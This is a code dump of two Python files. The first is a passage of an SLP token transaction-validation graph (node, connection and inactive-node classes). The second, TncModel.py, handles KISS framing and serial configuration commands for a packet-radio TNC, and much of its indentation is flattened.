self.debug("Cannot find proxy validity for %.10s..."%(txid,))
continue
self.debug("Using proxy validity (%r) for %.10s..."%(proxyval, txid,))
# every step:
n.set_validity(*proxyval)
self.run_sched()
class Connection:
# Connection represents a tx output <-> tx input connection
    # (we don't use a namedtuple since we want 'parent' to be modifiable.)
__slots__ = ('parent', 'child', 'vout', 'vin', 'checked')
def __init__(self, parent,child,vout,vin):
self.parent = parent
self.child = child
self.vout = vout
self.vin = vin
self.checked = False
class Node:
"""
Nodes keep essential info about txes involved in the validation DAG.
They have a list of Connections to parents (inputs) and to children
(outputs).
Connections to children are used to notify (via ping()) when:
- Node data became available (changed from waiting to live)
- Node conclusion reached (changed from active to inactive)
- Connection pruned (parent effectively inactive)
Connections to parents are used to notify them when our depth gets
updated.
When our node is active, it can either be in waiting state where the
transaction data is not yet available, or in a live state.
The node becomes inactive when a conclusion is reached: either
pruned, invalid, or valid. When this occurs, the node replaces itself
with a NodeInactive object (more compact).
"""
def __init__(self, txid, graph):
self.txid = txid
self.graph = graph
self.conn_children = list()
self.conn_parents = ()
self.depth = INF_DEPTH
self.waiting = True
self.active = True
self.validity = 0 # 0 - unknown, 1 - valid, 2 - invalid
self.myinfo = None # self-info from get_info().
self.outputs = None # per-output info from get_info(). None if waiting/pruned/invalid.
# self._lock = ... # threading not enabled.
@property
def status(self):
if self.waiting:
return 'waiting'
if self.active:
return 'live'
else:
return 'inactive'
def __repr__(self,):
return "<%s %s txid=%r>"%(type(self).__qualname__, self.status, self.txid)
## Child connection adding/removing
def add_child(self, connection):
""" Called by children to subscribe notifications.
(If inactive, a ping will be scheduled.)
"""
# with self._lock:
if not self.active:
connection.parent = self.replacement
self.graph.add_ping(connection.child)
return
if connection.parent is not self:
raise RuntimeError('mismatch')
self.conn_children.append(connection)
newdepth = min(1 + connection.child.depth,
INF_DEPTH)
olddepth = self.depth
if newdepth < olddepth:
# found a shorter path from root
self.depth = newdepth
for c in self.conn_parents:
if c.parent.depth == 1 + olddepth:
# parent may have been hanging off our depth value.
self.graph.add_recalc_depth(c.parent, newdepth)
return
def del_child(self, connection):
""" called by children to remove connection
"""
# with self._lock:
self.conn_children.remove(connection)
if self.depth <= connection.child.depth+1:
self.graph.add_recalc_depth(self, self.depth)
## Loading of info
def load_tx(self, tx, cached_validity = None):
""" Convert 'waiting' transaction to live one. """
# with self._lock:
if not self.waiting:
raise DoubleLoadException(self)
if tx.txid_fast() != self.txid:
raise ValueError("TXID mismatch", tx.txid_fast(), self.txid)
validator = self.graph.validator
ret = validator.get_info(tx)
if len(ret) == 2:
self.graph.debug("%.10s... judged upon loading: %s",
self.txid, self.graph.validator.validity_states.get(ret[1],ret[1]))
if ret[0] != 'prune':
raise ValueError(ret)
return self._inactivate_self(False, ret[1])
vin_mask, self.myinfo, self.outputs = ret
if len(self.outputs) != len(tx.outputs()):
raise ValueError("output length mismatch")
if cached_validity is not None:
self.graph.debug("%.10s... cached judgement: %s",
self.txid, self.graph.validator.validity_states.get(cached_validity,cached_validity))
return self._inactivate_self(True, cached_validity)
# at this point we have exhausted options for inactivation.
# build connections to parents
txinputs = tx.inputs()
if len(vin_mask) != len(txinputs):
raise ValueError("input length mismatch")
conn_parents = []
for vin, (mask, inp) in enumerate(zip(vin_mask, txinputs)):
if not mask:
continue
txid = inp['prevout_hash']
vout = inp['prevout_n']
p = self.graph.get_node(txid)
c = Connection(p,self,vout,vin)
p.add_child(c)
conn_parents.append(c)
self.conn_parents = conn_parents
self.waiting = False
self.graph.add_ping(self)
if len(self.conn_parents) != 0:
# (no parents? children will be pinged after validation)
for c in self.conn_children:
self.graph.add_ping(c.child)
def load_pruned(self, cached_validity):
# with self._lock:
if not self.waiting:
raise DoubleLoadException(self)
self.graph.debug("%.10s... load pruned: %s",
self.txid, self.graph.validator.validity_states.get(cached_validity,cached_validity))
return self._inactivate_self(False, cached_validity)
def set_validity(self, keepinfo, validity):
# with self._lock:
self._inactivate_self(keepinfo, validity)
## Internal utility stuff
def _inactivate_self(self, keepinfo, validity):
# Replace self with NodeInactive instance according to keepinfo and validity
# no thread locking here, this only gets called internally.
if keepinfo:
replacement = NodeInactive(validity, self.outputs)
else:
replacement = self.graph.prunednodes[validity] # use singletons
# replace self in lookups
self.graph.replace_node(self.txid, replacement)
# unsubscribe from parents & forget
for c in self.conn_parents:
c.parent.del_child(c)
self.conn_parents = ()
# replace self in child connections & forget
for c in self.conn_children:
c.parent = replacement
c.checked = False
self.graph.add_ping(c.child)
self.conn_children = ()
# At this point all permanent refs to us should be gone and we will soon be deleted.
# Temporary refs may remain, for which we mimic the replacement.
self.waiting = False
self.active = False
self.depth = replacement.depth
self.validity = replacement.validity
self.outputs = replacement.outputs
self.replacement = replacement
def recalc_depth(self):
# with self._lock:
if not self.active:
return
depths = [c.child.depth for c in self.conn_children]
depths.append(INF_DEPTH-1)
newdepth = 1 + min(depths)
olddepth = self.depth
if newdepth != olddepth:
self.depth = newdepth
depthpriority = 1 + min(olddepth, newdepth)
for c in self.conn_parents:
self.graph.add_recalc_depth(c.parent, depthpriority)
def get_out_info(self, c):
# Get info for the connection and check if connection is needed.
# Returns None if validator's check_needed returns False.
# with self._lock:
try:
out = self.outputs[c.vout]
except TypeError: # outputs is None or vout is None
out = None
if not c.checked and not self.waiting:
if c.child.graph.validator.check_needed(c.child.myinfo, out):
c.checked = True
else:
return None
return (self.active, self.waiting, c.vin, self.validity, out)
def ping(self, ):
""" handle notification status update on one or more parents """
# with self._lock:
if not self.active:
return
validator = self.graph.validator
# get info, discarding unneeded parents.
pinfo = []
for c in tuple(self.conn_parents):
info = c.parent.get_out_info(c)
if info is None:
c.parent.del_child(c)
self.conn_parents.remove(c)
else:
pinfo.append(info)
anyactive = any(info[0] for info in pinfo)
if validator.prevalidation:
if any(info[1] for info in pinfo):
return
else:
if anyactive:
return
valinfo = [info[2:] for info in pinfo]
ret = validator.validate(self.myinfo, valinfo)
if ret is None: # undecided
from .slp_validator_0x01_nft1 import Validator_NFT1
if isinstance(validator, Validator_NFT1):
self.waiting = True
return
if not anyactive:
raise RuntimeError("Undecided with finalized parents",
self.txid, self.myinfo, valinfo)
return
else: # decided
self.graph.debug("%.10s... judgement based on inputs: %s",
self.txid, self.graph.validator.validity_states.get(ret[1],ret[1]))
self._inactivate_self(*ret)
class NodeRoot: # Special root, only one of these is created per TokenGraph.
depth = -1
def __init__(self, graph):
self.graph = graph
self.conn_parents = []
def set_parents(self, parent_nodes):
# Remove existing parent connections
for c in tuple(self.conn_parents):
c.parent.del_child(c)
self.conn_parents.remove(c)
# Add new ones
for p in parent_nodes:
c = Connection(p, self, None, None)
p.add_child(c)
self.conn_parents.append(c)
return c
def ping(self,):
pass
# container used to replace Node with static result
class NodeInactive(collections.namedtuple('anon_namedtuple',
['validity', 'outputs'])):
__slots__ = () # no dict needed
active = False
waiting = False
depth = INF_DEPTH
txid = None
status = "inactive"
def get_out_info(self, c):
# Get info for the connection and check if connection is needed.
# Returns None if validator's check_needed returns False.
try:
out = self.outputs[c.vout]
except TypeError: # outputs is None or vout is None
out = None
if not c.checked:
if c.child.graph.validator.check_needed(c.child.myinfo, out):
c.checked = True
else:
return None
return (False, False, c.vin, self.validity, out)
def load_tx(self, tx, cached_validity = None):
raise DoubleLoadException(self)
def add_child(self, connection): # refuse connection and ping
connection.child.graph.add_ping(connection.child)
def del_child(self, connection): pass
def recalc_depth(self): pass
|
TncModel.py
|
#!/usr/bin/env python2.7
from __future__ import print_function, unicode_literals
from builtins import bytes, chr
import threading
import serial
import time
import datetime
import math
import traceback
from io import StringIO, BytesIO
from struct import pack, unpack
from gi.repository import GLib
from BootLoader import BootLoader
import binascii
class UTC(datetime.tzinfo):
"""UTC"""
ZERO = datetime.timedelta(0)
def utcoffset(self, dt):
return self.ZERO
def tzname(self, dt):
return "UTC"
def dst(self, dt):
return self.ZERO
utc = UTC()
class KissData(object):
def __init__(self):
        self.packet_type = None
        self.sub_type = None
        self.data = None
        self.ready = False
class KissDecode(object):
WAIT_FEND = 1
WAIT_PACKET_TYPE = 2
WAIT_SUB_TYPE = 3
WAIT_DATA = 4
FEND = 0xC0
FESC = 0xDB
TFEND = 0xDC
TFESC = 0xDD
def __init__(self):
self.state = self.WAIT_FEND
self.packet = KissData()
self.escape = False
self.parser = {
self.WAIT_FEND: self.wait_fend,
self.WAIT_PACKET_TYPE: self.wait_packet_type,
self.WAIT_SUB_TYPE: self.wait_sub_type,
self.WAIT_DATA: self.wait_data}
self.tmp = bytearray()
def process(self, c):
if self.escape:
if c == self.TFEND:
c = self.FEND
elif c == self.TFESC:
c = self.FESC
else:
# Bogus sequence
self.escape = False
return None
elif c == self.FESC:
self.escape = True
return None
self.parser[self.state](c, self.escape)
self.escape = False
if self.packet is not None and self.packet.ready:
return self.packet
else:
return None
def wait_fend(self, c, escape):
if c == self.FEND:
self.state = self.WAIT_PACKET_TYPE
self.packet = KissData()
# print self.tmp
self.tmp = bytearray()
else:
self.tmp.append(c)
def wait_packet_type(self, c, escape):
if not escape and c == self.FEND: return # possible dupe
self.packet.packet_type = c
if c == 0x06:
self.state = self.WAIT_SUB_TYPE
else:
self.packet.data = bytearray()
self.state = self.WAIT_DATA
def wait_sub_type(self, c, escape):
self.packet.sub_type = c
self.packet.data = bytearray()
self.state = self.WAIT_DATA
def wait_data(self, c, escape):
if not escape and c == self.FEND:
self.packet.ready = True
self.state = self.WAIT_FEND
else:
self.packet.data.append(c)
class KissEncode(object):
FEND = bytes(b'\xC0')
FESC = bytes(b'\xDB')
TFEND = bytes(b'\xDC')
TFESC = bytes(b'\xDD')
def __init__(self):
pass
def encode(self, data):
buf = BytesIO()
buf.write(self.FEND)
        for c in data:
            # Iterating over bytes yields ints, so compare against the
            # integer values of the framing bytes; otherwise no escaping
            # would ever be applied.
            if c == self.FEND[0]:
                buf.write(self.FESC)
                buf.write(self.TFEND)
            elif c == self.FESC[0]:
                buf.write(self.FESC)
                buf.write(self.TFESC)
            else:
                buf.write(bytes([c]))
buf.write(self.FEND)
return buf.getvalue()
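# Hedged worked example (not from the original source) of the KISS escaping
# performed by KissEncode/KissDecode above: a payload byte equal to the frame
# delimiter 0xC0 must be escaped so it cannot be mistaken for end-of-frame.
#
#   payload:  06 01 C0
#   encoded:  C0 | 06 01 DB DC | C0   (FEND, data with C0 -> FESC TFEND, FEND)
#
# KissDecode.process() reverses this one byte at a time and yields a KissData
# packet once the closing FEND is seen.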
class TncModel(object):
SET_TX_DELAY = bytes(b'\01%c')
SET_PERSISTENCE = bytes(b'\02%c')
SET_TIME_SLOT = bytes(b'\03%c')
SET_TX_TAIL = bytes(b'\04%c')
SET_DUPLEX = bytes(b'\05%c')
GET_BATTERY_LEVEL = bytes(b'\06\06')
SET_OUTPUT_VOLUME = bytes(b'\06\01%c')
SET_OUTPUT_GAIN = bytes(b'\x06\x01%c%c') # API 2.0, 16-bit signed
    SET_INPUT_TWIST = bytes(b'\x06\x18%c')      # API 2.0, 0-100
    SET_OUTPUT_TWIST = bytes(b'\x06\x1a%c')     # API 2.0, 0-100
SET_INPUT_ATTEN = bytes(b'\06\02%c')
SET_INPUT_GAIN = bytes(b'\06\02%c%c') # API 2.0, 16-bit signed
SET_SQUELCH_LEVEL = bytes(b'\06\03%c')
GET_ALL_VALUES = bytes(b'\06\177') # Get all settings and versions
POLL_VOLUME = bytes(b'\06\04') # One value
STREAM_VOLUME = bytes(b'\06\05') # Stream continuously
ADJUST_INPUT_LEVELS = bytes(b'\06\x2b') # API 2.0
SET_DATETIME = bytes(b'\x06\x32%c%c%c%c%c%c%c') # API 2.0, BCD YMDWHMS
PTT_MARK = bytes(b'\06\07')
PTT_SPACE = bytes(b'\06\010')
PTT_BOTH = bytes(b'\06\011')
PTT_OFF = bytes(b'\06\012')
SET_BT_CONN_TRACK = bytes(b'\06\105%c')
SAVE_EEPROM_SETTINGS = bytes(b'\06\052')
SET_USB_POWER_ON = bytes(b'\06\111%c')
SET_USB_POWER_OFF = bytes(b'\06\113%c')
SET_VERBOSITY = bytes(b'\06\020%c')
SET_PTT_CHANNEL = bytes(b'\06\117%c')
GET_PTT_CHANNEL = bytes(b'\06\120')
SET_PASSALL = bytes(b'\06\x51%c')
SET_MODEM_TYPE = bytes(b'\06\xc1\x82%c')
SET_RX_REVERSE_POLARITY = bytes(b'\06\x53%c')
SET_TX_REVERSE_POLARITY = bytes(b'\06\x55%c')
TONE_NONE = 0
TONE_SPACE = 1
TONE_MARK = 2
TONE_BOTH = 3
HANDLE_TX_DELAY = 33
HANDLE_PERSISTENCE = 34
HANDLE_SLOT_TIME = 35
HANDLE_TX_TAIL = 36
HANDLE_DUPLEX = 37
HANDLE_INPUT_LEVEL = 4
HANDLE_BATTERY_LEVEL = 6
HANDLE_TX_VOLUME = 12
HANDLE_TX_TWIST = 27 # API 2.0
HANDLE_INPUT_ATTEN = 13 # API 1.0
HANDLE_INPUT_GAIN = 13 # API 2.0
HANDLE_INPUT_TWIST = 25 # API 2.0
HANDLE_SQUELCH_LEVEL = 14
HANDLE_VERBOSITY = 17
HANDLE_FIRMWARE_VERSION = 40
HANDLE_HARDWARE_VERSION = 41
HANDLE_SERIAL_NUMBER = 47 # API 2.0
HANDLE_MAC_ADDRESS = 48
HANDLE_DATE_TIME = 49 # API 2.0
HANDLE_BLUETOOTH_NAME = 66
HANDLE_CONNECTION_TRACKING = 70
HANDLE_USB_POWER_ON = 74
HANDLE_USB_POWER_OFF = 76
HANDLE_MIN_INPUT_TWIST = 121 # API 2.0
HANDLE_MAX_INPUT_TWIST = 122 # API 2.0
HANDLE_API_VERSION = 123 # API 2.0
HANDLE_MIN_INPUT_GAIN = 124 # API 2.0
HANDLE_MAX_INPUT_GAIN = 125 # API 2.0
HANDLE_CAPABILITIES = 126
HANDLE_EXTENDED_1 = 0xc1
HANDLE_EXT1_SELECTED_MODEM_TYPE = 0x81
HANDLE_EXT1_SUPPORTED_MODEM_TYPES = 0x83
HANDLE_PTT_CHANNEL = 80
HANDLE_PASSALL = 82
HANDLE_RX_REVERSE_POLARITY = 84
HANDLE_TX_REVERSE_POLARITY = 86
CAP_EEPROM_SAVE = 0x0200
CAP_ADJUST_INPUT = 0x0400
CAP_DFU_FIRMWARE = 0x0800
def __init__(self, app, ser):
self.app = app
self.serial = ser
self.decoder = KissDecode()
self.encoder = KissEncode()
self.ser = None
self.thd = None
self.tone = self.TONE_NONE
self.ptt = False
self.reading = False
self.api_version = 0x0100
def __del__(self):
self.disconnect()
def connected(self):
return self.ser is not None
def connect(self):
if self.connected(): return
try:
# print("connecting to %s" % self.serial)
self.ser = serial.Serial(self.serial, 38400, timeout=.1)
# print("connected")
time.sleep(1)
self.sio_reader = self.ser # io.BufferedReader(self.ser)
self.sio_writer = self.ser # io.BufferedWriter(self.ser)
self.app.tnc_connect()
self.reading = True
self.thd = threading.Thread(target=self.readSerial, args=(self.sio_reader,))
self.thd.start()
self.sio_writer.write(self.encoder.encode(self.PTT_OFF))
self.sio_writer.flush()
time.sleep(1)
self.sio_writer.write(self.encoder.encode(self.GET_ALL_VALUES))
self.sio_writer.flush()
time.sleep(1)
self.sio_writer.write(self.encoder.encode(self.STREAM_VOLUME))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def internal_reconnect(self):
try:
self.sio_reader = self.ser
self.sio_writer = self.ser
self.reading = True
self.thd = threading.Thread(target=self.readSerial, args=(self.sio_reader,))
self.thd.start()
return True
except Exception as e:
self.app.exception(e)
return False
def reconnect(self):
if self.internal_reconnect():
self.app.tnc_connect()
self.sio_writer.write(self.encoder.encode(self.PTT_OFF))
self.sio_writer.flush()
time.sleep(1)
self.sio_writer.write(self.encoder.encode(self.GET_ALL_VALUES))
self.sio_writer.flush()
time.sleep(1)
self.sio_writer.write(self.encoder.encode(self.STREAM_VOLUME))
self.sio_writer.flush()
def internal_disconnect(self):
self.reading = False
if self.thd is not None:
try:
if self.sio_writer is not None:
self.sio_writer.write(self.encoder.encode(self.POLL_VOLUME))
self.sio_writer.flush()
self.thd.join()
self.thd = None
except Exception as e:
self.app.exception(e)
def disconnect(self):
self.internal_disconnect()
if self.app is not None: self.app.tnc_disconnect()
if self.ser is not None: self.ser.close()
self.ser = None
self.sio_writer = None
self.sio_reader = None
def update_rx_volume(self, value):
self.app.tnc_rx_volume(value)
def handle_packet(self, packet):
# print(packet.sub_type, packet.data)
if packet.packet_type == 0x07:
print(packet.data)
elif packet.packet_type != 0x06:
return
elif packet.sub_type == self.HANDLE_INPUT_LEVEL:
self.handle_input_level(packet)
elif packet.sub_type == self.HANDLE_TX_VOLUME:
self.handle_tx_volume(packet)
elif packet.sub_type == self.HANDLE_TX_TWIST:
self.handle_tx_twist(packet)
elif packet.sub_type == self.HANDLE_BATTERY_LEVEL:
self.handle_battery_level(packet)
elif packet.sub_type == self.HANDLE_INPUT_ATTEN:
self.handle_input_atten(packet)
elif packet.sub_type == self.HANDLE_INPUT_TWIST:
self.handle_input_twist(packet)
elif packet.sub_type == self.HANDLE_SQUELCH_LEVEL:
self.handle_squelch_level(packet)
elif packet.sub_type == self.HANDLE_TX_DELAY:
self.handle_tx_delay(packet)
elif packet.sub_type == self.HANDLE_PERSISTENCE:
self.handle_persistence(packet)
elif packet.sub_type == self.HANDLE_SLOT_TIME:
self.handle_slot_time(packet)
elif packet.sub_type == self.HANDLE_TX_TAIL:
self.handle_tx_tail(packet)
elif packet.sub_type == self.HANDLE_DUPLEX:
self.handle_duplex(packet)
elif packet.sub_type == self.HANDLE_FIRMWARE_VERSION:
self.handle_firmware_version(packet)
elif packet.sub_type == self.HANDLE_HARDWARE_VERSION:
self.handle_hardware_version(packet)
elif packet.sub_type == self.HANDLE_SERIAL_NUMBER:
self.handle_serial_number(packet)
elif packet.sub_type == self.HANDLE_MAC_ADDRESS:
self.handle_mac_address(packet)
elif packet.sub_type == self.HANDLE_DATE_TIME:
self.handle_date_time(packet)
elif packet.sub_type == self.HANDLE_BLUETOOTH_NAME:
self.handle_bluetooth_name(packet)
elif packet.sub_type == self.HANDLE_CONNECTION_TRACKING:
self.handle_bluetooth_connection_tracking(packet)
elif packet.sub_type == self.HANDLE_VERBOSITY:
self.handle_verbosity(packet)
elif packet.sub_type == self.HANDLE_CAPABILITIES:
self.handle_capabilities(packet)
elif packet.sub_type == self.HANDLE_PTT_CHANNEL:
self.handle_ptt_channel(packet)
elif packet.sub_type == self.HANDLE_USB_POWER_ON:
self.handle_usb_power_on(packet)
elif packet.sub_type == self.HANDLE_USB_POWER_OFF:
self.handle_usb_power_off(packet)
elif packet.sub_type == self.HANDLE_API_VERSION:
self.handle_api_version(packet)
elif packet.sub_type == self.HANDLE_MIN_INPUT_TWIST:
self.handle_min_input_twist(packet)
elif packet.sub_type == self.HANDLE_MAX_INPUT_TWIST:
self.handle_max_input_twist(packet)
elif packet.sub_type == self.HANDLE_MIN_INPUT_GAIN:
self.handle_min_input_gain(packet)
elif packet.sub_type == self.HANDLE_MAX_INPUT_GAIN:
self.handle_max_input_gain(packet)
elif packet.sub_type == self.HANDLE_PASSALL:
self.handle_passall(packet)
elif packet.sub_type == self.HANDLE_RX_REVERSE_POLARITY:
self.handle_rx_reverse_polarity(packet)
elif packet.sub_type == self.HANDLE_TX_REVERSE_POLARITY:
self.handle_tx_reverse_polarity(packet)
elif packet.sub_type == self.HANDLE_EXTENDED_1:
self.handle_extended_range_1(packet)
else:
# print "handle_packet: unknown packet sub_type (%d)" % packet.sub_type
# print "data:", packet.data
pass
def handle_extended_range_1(self, packet):
extended_type = packet.data[0]
packet.data = packet.data[1:]
if extended_type == self.HANDLE_EXT1_SELECTED_MODEM_TYPE:
self.handle_selected_modem_type(packet)
elif extended_type == self.HANDLE_EXT1_SUPPORTED_MODEM_TYPES:
self.handle_supported_modem_types(packet)
else:
pass # Unknown extended type
def readSerial(self, sio):
# print "reading..."
while self.reading:
try:
block = bytes(sio.read(160))
if len(block) == 0: continue
for c in block:
packet = self.decoder.process(c)
if packet is not None:
GLib.idle_add(self.handle_packet, packet)
# self.handle_packet(packet)
except ValueError as e:
self.app.exception(e)
pass
# print "done reading..."
def handle_input_level(self, packet):
v = packet.data[0]
v = max(v, 1)
volume = math.log(v) / math.log(2)
self.app.tnc_rx_volume(volume)
def handle_tx_volume(self, packet):
if self.api_version == 0x0100:
volume = packet.data[0]
else:
volume = (packet.data[0] * 256) + packet.data[1]
self.app.tnc_tx_volume(volume)
def handle_tx_twist(self, packet):
twist = packet.data[0]
self.app.tnc_tx_twist(twist)
def handle_battery_level(self, packet):
value = (packet.data[0] << 8) + packet.data[1]
self.app.tnc_battery_level(value)
# Also HANDLE_INPUT_GAIN
def handle_input_atten(self, packet):
if self.api_version == 0x0100:
atten = packet.data[0]
self.app.tnc_input_atten(atten != 0)
else:
gain = unpack('>h', packet.data)[0]
self.app.tnc_input_gain(gain)
def handle_input_twist(self, packet):
twist = packet.data[0]
self.app.tnc_input_twist(twist)
def handle_squelch_level(self, packet):
squelch = packet.data[0]
self.app.tnc_dcd(squelch)
def handle_tx_delay(self, packet):
value = packet.data[0]
self.app.tnc_tx_delay(value)
def handle_persistence(self, packet):
value = packet.data[0]
self.app.tnc_persistence(value)
def handle_slot_time(self, packet):
value = packet.data[0]
self.app.tnc_slot_time(value)
def handle_tx_tail(self, packet):
value = packet.data[0]
self.app.tnc_tx_tail(value)
def handle_duplex(self, packet):
value = packet.data[0]
self.app.tnc_duplex(value != 0)
def handle_firmware_version(self, packet):
self.app.tnc_firmware_version(packet.data.decode("utf-8"))
def handle_hardware_version(self, packet):
self.app.tnc_hardware_version(packet.data.decode("utf-8"))
def handle_serial_number(self, packet):
self.app.tnc_serial_number(packet.data.decode("utf-8"))
return
def handle_mac_address(self, packet):
self.app.tnc_mac_address(':'.join('{:02X}'.format(a) for a in packet.data))
return
def handle_date_time(self, packet):
def bcd_to_int(value):
return ((value // 16) * 10) + (value & 0x0F)
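        # Illustrative note (not original code): bcd_to_int(0x59) == 59,
        # i.e. the high nibble is the tens digit and the low nibble the ones.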
d = packet.data
# print("raw date:", binascii.hexlify(d))
year = bcd_to_int(d[0]) + 2000
month = bcd_to_int(d[1])
day = bcd_to_int(d[2])
weekday = bcd_to_int(d[3])
hour = bcd_to_int(d[4])
minute = bcd_to_int(d[5])
second = bcd_to_int(d[6])
try:
dt = datetime.datetime(year, month, day, hour, minute, second, tzinfo=utc)
self.app.tnc_date_time(dt.isoformat())
except Exception as ex:
self.app.tnc_date_time("RTC ERROR")
self.app.exception(ex)
def handle_bluetooth_name(self, packet):
pass
def handle_bluetooth_connection_tracking(self, packet):
self.app.tnc_conn_track(packet.data[0])
def handle_verbosity(self, packet):
self.app.tnc_verbose(packet.data[0])
def handle_ptt_channel(self, packet):
self.app.tnc_ptt_style(packet.data[0])
def handle_usb_power_on(self, packet):
self.app.tnc_power_on(packet.data[0])
def handle_usb_power_off(self, packet):
self.app.tnc_power_off(packet.data[0])
def handle_capabilities(self, packet):
if len(packet.data) < 2:
return
value = packet.data[1]
if (value << 8) & self.CAP_EEPROM_SAVE:
self.app.tnc_eeprom_save()
if (value << 8) & self.CAP_ADJUST_INPUT:
self.app.tnc_adjust_input()
if (value << 8) & self.CAP_DFU_FIRMWARE:
self.app.tnc_dfu_firmware()
def handle_api_version(self, packet):
if len(packet.data) < 2:
return
self.api_version = unpack('>h', packet.data)[0]
def handle_min_input_twist(self, packet):
self.app.tnc_min_input_twist(unpack('b', packet.data)[0])
def handle_max_input_twist(self, packet):
self.app.tnc_max_input_twist(unpack('b', packet.data)[0])
def handle_min_input_gain(self, packet):
self.app.tnc_min_input_gain(unpack('>h', packet.data)[0])
def handle_max_input_gain(self, packet):
self.app.tnc_max_input_gain(unpack('>h', packet.data)[0])
def handle_passall(self, packet):
self.app.tnc_passall(packet.data[0])
def handle_rx_reverse_polarity(self, packet):
self.app.tnc_rx_reverse_polarity(packet.data[0])
def handle_tx_reverse_polarity(self, packet):
self.app.tnc_tx_reverse_polarity(packet.data[0])
def handle_selected_modem_type(self, packet):
self.app.tnc_selected_modem_type(packet.data[0])
def handle_supported_modem_types(self, packet):
self.app.tnc_supported_modem_types(packet.data)
def set_tx_volume(self, volume):
if self.sio_writer is None: return
try:
if self.api_version == 0x0100:
self.sio_writer.write(self.encoder.encode(
bytes(pack('>BBB', 6, 1, volume))))
else:
self.sio_writer.write(self.encoder.encode(
bytes(pack('>BBh', 6, 1, volume))))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_tx_twist(self, twist):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(
bytes(pack('>BBb', 6, 0x1a, twist))))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_input_atten(self, value):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(self.SET_INPUT_ATTEN % (2 * value)))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_squelch_level(self, value):
"""Used to set DCD"""
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(self.SET_SQUELCH_LEVEL % (value)))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_input_gain(self, gain):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(
bytes(pack('>BBh', 6, 0x2, gain))))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_input_twist(self, twist):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(
bytes(pack('>BBb', 6, 0x18, twist))))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def adjust_input(self):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(self.ADJUST_INPUT_LEVELS))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_tx_delay(self, delay):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(self.SET_TX_DELAY % delay))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_persistence(self, p):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(self.SET_PERSISTENCE % (p)))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_time_slot(self, timeslot):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(self.SET_TIME_SLOT % (timeslot)))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_tx_tail(self, tail):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(self.SET_TX_TAIL % (tail)))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_duplex(self, value):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(self.SET_DUPLEX % (value)))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_conn_track(self, value):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(self.SET_BT_CONN_TRACK % (value)))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_verbosity(self, value):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(self.SET_VERBOSITY % (value)))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_passall(self, value):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(self.SET_PASSALL % (value)))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_rx_reverse_polarity(self, value):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(self.SET_RX_REVERSE_POLARITY % (value)))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_tx_reverse_polarity(self, value):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(self.SET_TX_REVERSE_POLARITY % (value)))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_modem_type(self, value):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(self.SET_MODEM_TYPE % (value)))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_usb_on(self, value):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(self.SET_USB_POWER_ON % chr(value)))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_usb_off(self, value):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(self.SET_USB_POWER_OFF % (value)))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def save_eeprom_settings(self):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(self.SAVE_EEPROM_SETTINGS))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_ptt_channel(self, value):
if self.sio_writer is None: return
try:
self.sio_writer.write(self.encoder.encode(self.SET_PTT_CHANNEL % int(value)))
self.sio_writer.write(self.encoder.encode(self.GET_PTT_CHANNEL))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def set_mark(self, value):
if self.sio_writer is None: return
if value:
self.tone |= self.TONE_MARK
else:
self.tone &= self.TONE_SPACE
self.set_ptt(self.ptt)
def set_space(self, value):
if self.sio_writer is None: return
if value:
self.tone |= self.TONE_SPACE
else:
self.tone &= self.TONE_MARK
self.set_ptt(self.ptt)
def set_ptt(self, value):
if self.sio_writer is None: return
# print "PTT: %s, Tone=%d" % (str(value), self.tone)
self.ptt = value
try:
if value and self.tone != self.TONE_NONE:
if self.tone == self.TONE_MARK:
self.sio_writer.write(self.encoder.encode(self.PTT_MARK))
elif self.tone == self.TONE_SPACE:
self.sio_writer.write(self.encoder.encode(self.PTT_SPACE))
elif self.tone == self.TONE_BOTH:
self.sio_writer.write(self.encoder.encode(self.PTT_BOTH))
else:
self.sio_writer.write(self.encoder.encode(self.PTT_OFF))
self.sio_writer.flush()
except Exception as e:
self.app.exception(e)
def stream_audio_on(self):
if self.sio_writer is None: return
